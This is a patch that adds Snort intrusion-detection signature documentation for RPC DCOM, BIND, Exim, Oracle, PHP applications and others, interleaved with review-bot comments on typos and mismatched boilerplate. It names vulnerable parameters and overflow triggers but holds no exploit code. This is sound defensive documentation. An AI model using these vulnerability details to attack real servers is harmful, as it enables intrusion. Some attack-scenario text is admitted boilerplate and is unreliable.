+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpNuke
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
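Review bot: the Attack Scenarios paragraph ("An attacker can access an authentication mechanism and supply his/her own credentials ...") is authentication boilerplate that does not describe remote file inclusion through the "phpbb_root_path" parameter; replace it with the file-inclusion scenario the Summary describes. The third paragraph of Detailed Information is the same credential-checking boilerplate and can go. Also: the file opens with two blank lines before "Rule:", "running ona web server" should be "running on a web server", and "an exploitation attempt has been attempted" is redundant.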
--- /dev/null
+++ b/doc/signatures/3353.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3353
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
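Review bot: typo in Ease of Attack, "Expoit code exists" should be "Exploit code exists". Attack Scenarios ("a request for a file with an overly long filename via a network share") never mentions RPC, while Detailed Information attributes the overflow to a malformed request to an RPC port; add the sentence that connects the two so the reader can see how the long filename reaches the DCOM interface. Additional References is empty; the Microsoft advisory for the RPC DCOM flaw belongs here.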
--- /dev/null
+++ b/doc/signatures/260.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+261
+
+--
+Summary:
+This event is generated by an attempted buffer overflow associated with improperly formatted DNS inverse queries. 
+
+--
+Impact:
+Severe. The DNS server can be compromised allowing the attacker access at the privilege level at which BIND runs.  
+
+--
+Detailed Information:
+Certain versions of BIND do no perform correct bounds checking when responding to an inverse query. A maliciously formatted inverse query can cause the DNS server to crash and allow remote access with the privileges of the user running BIND.  Inverse queries are disabled by default; this attack can affect DNS servers that have been configured to enable them.
+
+--
+Affected Systems:
+BIND 4.9 releases prior to 4.9.7 and BIND 8 releases prior to 8.1.2. 
+
+--
+Attack Scenarios:
+An attacker can launch this exploit to gain remote access to the DNS server.
+
+--
+Ease of Attack:
+Simple.  Code exists to exploit the buffer overflow.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to a version of BIND that is not vulnerable to this attack.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-1998-05.html
+
+
+--
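Review bot: the file is doc/signatures/260.txt but the Sid field says 261; one of the two is wrong, and since the rule documentation is looked up by sid this must be fixed before merging. Typo in Detailed Information, "do no perform correct bounds checking" should be "do not perform". Minor: the CERT reference is followed by two blank lines before the closing "--".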
--- /dev/null
+++ b/doc/signatures/110-3.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+110-3
+
+--
+Summary:
+This event is generated when the pre-processor spp_unidecode detects
+network traffic that may constitute an attack. Specifically an unknown
+mapping was detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the spp_unidecode pre-processor detects
+network traffic that may consititute an attack.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
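Review bot: the Attack Scenarios section is empty, and Detailed Information only repeats the Summary; the Summary's key term "an unknown mapping was detected" is never explained, so say what kind of mapping spp_unidecode is checking and why an unknown one is suspicious, or mark the section as not applicable. Typo in Detailed Information, "consititute" should be "constitute". Additional References is empty.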
--- /dev/null
+++ b/doc/signatures/100000171.txt
@@ -0,0 +1,61 @@
+Rule: 
+
+--
+Sid: 
+100000171
+
+-- 
+Summary: 
+This event is generated when an overly long Accept: parameter is sent in an 
+HTTP request, which will cause a buffer overflow to occur in the GFI 
+MailSecurity for Exchange/SMTP web interface.
+
+--
+Impact:
+A denial of service will occur in the vulnerable application, and remote code 
+may be executed with the priviliges of the user running the application.
+
+--
+Detailed Information:
+GFI MailSecurity for Exchange/SMTP is an anti-virus program that integrates 
+with Microsoft Exchange servers. Its web interface is vulnerable to a buffer 
+overflow attack, which may be triggered by sending a Accept: parameter of 100 
+or more bytes in an HTTP request. Vulnerable versions of the application will 
+crash, and code may be executed with the priviliges of the user running the 
+program.
+
+--
+Affected Systems:
+GFI MailSecurity for Exchange/SMTP 8.1
+
+--
+Attack Scenarios:
+Attackers will likley exploit this with a script.
+
+--
+Ease of Attack:
+Simple, as no authentication is required, and HTTP is a well-documented 
+protocol, which allows for easy creation of malicious packets.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Download and apply the patch referenced below.
+
+--
+Contributors:
+rmkml
+Sourcefire Research Team
+
+--
+Additional References
+ftp://ftp.gfi.com/patches/MSEC8_PATCH_20050919_01.zip
+
+--
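Review bot: spelling in Impact and Detailed Information, "priviliges" should be "privileges" (twice); in Attack Scenarios "likley" should be "likely"; in Detailed Information "a Accept: parameter" should be "an Accept: parameter". The "Additional References" heading is missing its colon, unlike the other files in this patch.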
--- /dev/null
+++ b/doc/signatures/2590.txt
@@ -0,0 +1,68 @@
+Rule:
+
+
+--
+Sid:
+2590
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow
+associated with the Mail Transfer Agent Exim.
+
+--
+Impact:
+A successful attack may allow the execution of arbitrary code on a vulnerable
+server with the privilege of the process running Exim.
+
+--
+Detailed Information:
+Exim is vulnerable to a buffer overflow, permitting an attacker to execute
+arbitrary code.  The vulnerability may be exploited if Exim is configured to
+verify header syntax in the e-mail message body.  This is not the default
+configuration.  If an attacker supplies a large number of spaces after certain
+header fields, it may be possible to cause a buffer overflow.
+
+--
+Affected Systems:
+Exim prior to version 4.34
+
+--
+Attack Scenarios:
+An attacker can create and send mail with a malformed header,
+possibly causing a buffer overflow and permitting the execution of arbitrary code.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Bugtraq:
+http://www.securityfocus.com/bid/10291
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0400
+
+Other:
+http://www.guninski.com/exim1.html
+
+--
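Review bot: the "Additional References" heading is missing its colon, and the "--" after False Negatives lacks the blank line used before every other separator in the file, while "Rule:" and the Sid value are each followed by two blank lines. In Impact, "with the privilege of the process running Exim" should be "with the privileges of the process running Exim". Content is otherwise consistent: Affected Systems (prior to 4.34) matches the references cited.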
--- /dev/null
+++ b/doc/signatures/2799.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2799
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure relocate_masterdef
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
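Review bot: same line-break defect as sids 2872 and 2918: the Detailed Information sentence breaks before its period, leaving a line that starts ". This procedure is included in"; join it as "vulnerability in the procedure relocate_masterdef. This procedure is included in dbms_repcat." The package is given as "dbms_repcat" without the "sys." prefix that the other two Oracle files use (sys.dbms_repcat_conf, sys.dbms_repcat_sna); check which form is intended and make the three files consistent. Affected Systems reads "Oracle Oracle9i", and Additional References is empty.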
--- /dev/null
+++ b/doc/signatures/404.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+404
+
+--
+
+Summary:
+This event is generated when An ICMP Protocol Unreachable datagram is detected on the network.  
+
+--
+
+Impact:
+This could be an indication of improperly configured routing equipment or network host.
+
+--
+
+Detailed Information: 
+This rule generates informational events about the network.  Routers will generate this message when the transport protocol designated in the datagram is not supported in the transport layer of the final destination.  Large numbers of these messages on the network could indication routing problems, faulty routing devices, or improperly configured hosts.
+
+--
+
+Attack Scenarios:
+None Known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate these types of ICMP datagrams.
+
+--
+
+False Positives:
+None Known
+
+--
+
+False Negatives:
+None Known
+
+--
+
+Corrective Action:
+This rule detects informational network information, no corrective action is necessary.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
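Review bot: Typos in the Summary and Detailed Information lines: "when An ICMP Protocol Unreachable" should use lower-case "an", and "could indication routing problems" should read "could indicate routing problems". In Corrective Action, "This rule detects informational network information" is redundant; "This rule generates informational events only" is clearer. "Attack Scenarios: None Known" also sits oddly next to "Ease of Attack: Numerous tools and scripts can generate these types of ICMP datagrams."; either state the scenario those tools represent or mark Ease of Attack as not applicable so the two sections agree.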
--- /dev/null
+++ b/doc/signatures/2926.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2926
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the PHP web application PhpGedView.
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+PhpGedView contains a flaw such that it may be possible for an attacker
+to include code of their choosing by manipulating the PGV_BASE_DIRECTORY
+parameter when making a GET or POST  request to a vulnerable system.
+
+It may be possible for an attacker to execute that code with the
+privileges of the user running the webserver, usually root.
+
+--
+Affected Systems:
+	PhpGedView 2.65.1 and earlier
+
+--
+Attack Scenarios:
+An attacker can make a request to an affected script and define their
+own path to the PGV_BASE_DIRECTORY variable.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
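Review bot: The Detailed Information paragraph says code runs "with the privileges of the user running the webserver, usually root", which is inaccurate for typical Apache or IIS deployments, where requests are handled by an unprivileged account; the "usually root" qualifier overstates Impact and should be dropped, leaving "with the privileges of the user running the webserver". Also "GET or POST  request" has a doubled space, and "Additional References:" is empty even though the entry names the PGV_BASE_DIRECTORY parameter and the affected versions ("PhpGedView 2.65.1 and earlier"); a vendor advisory link would back up the version claim.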
--- /dev/null
+++ b/doc/signatures/952.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+952
+
+--
+
+Summary:
+This event is generated when an attempt is made to use a Frontpage 
+client to connect and/or publish content to a web server with Frontpage 
+Server Extensions-enabled. 
+
+--
+
+Impact:
+An attacker can modify web content, access privileged files or modify 
+other users' privileges on the Frontpage-enabled virtual host.
+
+--
+
+Detailed Information:
+Microsoft Frontpage is a web-content managing and publishing 
+application, which also comes with server extensions for Microsoft IIS 
+and Apache web servers. The extensions enable the servers to display 
+dynamic content, as well as perform certain levels of web-server 
+administration.
+
+--
+
+Affected Systems:
+All systems running FPSE.
+
+--
+
+Attack Scenarios:
+An attacker can gain the FPSE username and password via sniffing, social
+engineering or brute force guessing. After successfully logging on to 
+the system, the attacker can alter web contents, modify login 
+information for other users and generally control the web server.
+
+--
+
+Ease of Attack:
+After gaining the login credentials the attack is trivial. 
+
+--
+
+False Positives:
+If FrontPage authoring is allowed from resources external to the 
+protected network this rule will generate an event.
+
+--
+
+False Negatives:
+Not known.
+
+--
+
+Corrective Action:
+Disable FPSE if it is not needed for web-content management.
+
+--
+
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Chaos <c@aufbix.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/2144
+
+--
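Review bot: Corrective Action only says "Disable FPSE if it is not needed for web-content management.", while the False Positives entry already concedes the rule fires whenever authoring is allowed from outside the protected network; add a line recommending that authoring be restricted to trusted source addresses, so the event stays meaningful where FPSE must remain enabled. Minor: "Frontpage Server Extensions-enabled" should read "FrontPage Server Extensions enabled" (the product spelling "FrontPage" is used later in the same file), and "False Negatives: Not known." differs from the "None known" wording used in the other entries.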
--- /dev/null
+++ b/doc/signatures/1086.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1086
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
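Review bot: The Summary and Detailed Information never say which PHP application, script or parameter the rule matches ("a known vulnerability in a PHP web application"), unlike the Ovidentia and Fastpublish entries in this patch, so an analyst cannot tell from the document what triggered the event; name the request pattern the rule looks for. Typos: "running ona web server" should be "on a", and "the attackers choosing" should be "the attacker's choosing" (it occurs twice).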
--- /dev/null
+++ b/doc/signatures/650.txt
@@ -0,0 +1,82 @@
+Rule:  
+--
+Sid:
+650
+
+--
+Summary:
+Shellcode to set the user identity to 0 (root) was detected.
+
+--
+Impact:
+If this code is executed successfully, it is possible for the current
+process to inherity root privledges.  However, setuid(2) requires root
+privledges to be executed in the first place if the current uid is
+attempting to get a higher priviledge level.
+
+--
+Detailed Information:
+Snort detected data resembling the x86 assembly code to change the
+user identity to 0.  
+
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+As part of an attack on a remote service, an attacker may attempt to
+take advantage of insecure coding practices and execute code of his or
+her choosing through techniques known as 'buffer-overflows',
+'format-strings' and others.  Such attacks may contain code to change
+the identity of the current user to that of the root account (setuid
+0).  
+
+--
+Ease of Attack:
+Non-trivial.  Shellcode (and just x86 assembly code in general)
+requires a fairly intimate knowledge of computer architecture, memory
+structures, and many concepts that are part of the more arcane areas
+of computing.  Furthermore, if this was in fact an attack, the
+attacker needs to have a good idea of the design of the both the
+program and the system that he or she is attacking. The x86 setuid
+call itself is not particularly difficult, and by itself is not
+harmful.  However, combined with other carefuly aimed shellcode, it
+can be quite lethal.
+
+--
+False Positives:
+None Known
+Fairly high.  Large binary transfers, certain web traffic, and even
+mail traffic can trigger this rule, but are not necessarily indicative
+of actualy setuid code.
+
+--
+False Negatives:
+None Known
+Unknown, but probably possible.
+
+--
+Corrective Action:
+Determine what stream of traffic generated this particular alert.  If
+you only have the alert but not the entire packet, examine system for
+pecularities.  If you are smart and have the entire packet (or better
+yet, all your traffic for the past n hours), attempt to determine if
+this particular sequence of characters was part of an innocent stream
+of data (large binary transfers, for example) or part of a malicious
+act against your machine.  In either case, check for other activity
+from the host in question -- both currently collected traffic and
+traffic in the future.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Jon Hart <warchild@spoofed.org> 
+
+-- 
+Additional References:
+
+--
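Review bot: The False Positives and False Negatives sections each contain two contradictory answers ("None Known" immediately followed by "Fairly high.  Large binary transfers ...", and "None Known" followed by "Unknown, but probably possible."); keep the second, more accurate statement in each and drop the "None Known" line. "Affected Systems:" is empty; since Detailed Information says the rule matches x86 assembly, "x86 systems" or similar belongs there. Spelling: "inherity", "privledges", "priviledge", "carefuly", "actualy", "pecularities" and "unkown" should be "inherit", "privileges", "privilege", "carefully", "actually", "peculiarities" and "unknown".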
--- /dev/null
+++ b/doc/signatures/1744.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1744
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
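Review bot: As with the 1086 entry, the Summary and Detailed Information describe web server attacks in general ("a known vulnerability on a web server or a web application resident on a web server") without stating what request content sid 1744 matches, so the document cannot be used to triage the event; add the matched URI or payload. Also "the attackers choosing" should be "the attacker's choosing".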
--- /dev/null
+++ b/doc/signatures/628.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+628
+
+--
+Summary:
+This event is generated when the nmap port scanner and reconnaissance 
+tool is used against a host.
+
+--
+Impact:
+This could be part of a full scan by nmap and could indicate 
+potential malicious reconnaissance of the targeted network or host.
+
+--
+Detailed Information:
+Some versions of Nmap's TCP ping, if selected, sends a TCP ACK with an 
+ACK number = 0. 
+
+Nmap can use TCP ping as a second alternative to ICMP Ping.
+
+--
+Affected Systems:
+All systems not protected by a stateful firewall are affected. The TCP 
+Ping targeted port does  not need to be open on the host being probed to
+determine if the machine is alive or not.
+
+--
+Attack Scenarios:
+The first thing an attacker does is to gather some information about its
+target, he may use Nmap to see if the potential target is alive on 
+certain network. Included as part of the "pinging" technique used by 
+Nmap, a TCP ping can be used on certain networks that don't allow the 
+ICMP Protocol.
+
+--
+Ease of Attack:
+Simple. Nmap requires no specialized experience to use it.
+
+--
+False Positives:
+This particular Nmap TCP Ping uses a TCP ACK with an ACK Number = 0. It 
+is possible that other tools may also send a TCP ACK with an ACK number 
+of Zero.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Any stateful firewall should be enough to protect a host from being "TCP
+ACK probed". If you have more suspicious/malicious activity from the 
+host doing the portscan, follow your standard procedure to asess the 
+potential threat. If you only detect TCP Pings, that may be just a TCP 
+Ping Sweep and it is not a real threat.
+
+--
+Contributors:
+Original Rule Writer Unknown (prime suspect is Marty Roesch)
+Snort documentation contributed by Jose Hernandez <jrseal76@hotmail.com>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+arachnids: ids28
+
+--
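Review bot: Subject-verb agreement in Detailed Information: "Some versions of Nmap's TCP ping, if selected, sends a TCP ACK" should be "send". The Attack Scenarios sentence is a run-on ("gather some information about its target, he may use Nmap"); split it at the comma. "asess" in Corrective Action should be "assess", and "does  not" has a doubled space. The reference "arachnids: ids28" is a bare identifier; the 605 entry in this patch gives the full URL form (http://www.whitehats.com/info/IDS393), so use the same form here.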
--- /dev/null
+++ b/doc/signatures/2778.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2778
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_priority_varchar2
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
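Review bot: Same issues as the relocate_masterdef entry: the procedure name is split with a dangling period across "vulnerability in the procedure drop_priority_varchar2" / ". This procedure is included in" / "dbms_repcat."; join the sentence so the full package.procedure name reads as one. "Affected Systems:" duplicates the vendor ("Oracle Oracle9i"), and "Additional References:" is empty although the only corrective action is a vendor patch.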
--- /dev/null
+++ b/doc/signatures/100000401.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000401
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "faq.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "faq.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
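Review bot: The third Detailed Information paragraph ("This event is generated when an attempt is made to gain unauthorized access to a CGI application ... validating the credentials of a client host") is credential-check boilerplate that does not describe a remote file include through "babInstallPath"; drop it, together with the Attack Scenarios text about supplying credentials, and keep only the file-include description. Also "may indicate that an exploitation attempt has been attempted" is tautological ("may indicate an exploitation attempt" suffices), "running ona web server" should be "on a", and the two leading blank lines before "Rule:" are inconsistent with the other files.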
--- /dev/null
+++ b/doc/signatures/1568.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1568
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
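Review bot: The Impact line "Information gathering possible administrator access." is missing punctuation between its two clauses; "Information gathering. Possible administrator access." matches the style of the other entries. "Sid: 1568" puts the number on the label line, whereas most files in this patch put it on the following line; pick one layout so the files can be parsed consistently. The Summary also never names the file the rule matches, even though Detailed Information and Attack Scenarios discuss retrieving "a sensitive file containing information on the IIS implementation".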
--- /dev/null
+++ b/doc/signatures/3006.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+3006
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a
+vulnerability in Freespace 2.
+
+--
+Impact:
+A successful attack may present an attacker with the opportunity to
+execute arbitrary code on a vulnerable system.
+
+--
+Detailed Information:
+A vulnerability exists in in Freespace 2 that may allow an attacker to
+execute code of their choosing on a vulnerable system.
+
+The problem lies in the handling of data by the client application when
+processing server responses. Proper checks are not performed by the
+client application and large amounts of data in a server response may
+trigger a buffer overflow condition to occur, thus presenting the
+attacker with the opportunity to execute code.
+
+--
+Affected Systems:
+	Freespace 2
+
+--
+Attack Scenarios:
+An attacker may supply a large amount of data containing code of their
+choosing in a server response to client requests.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
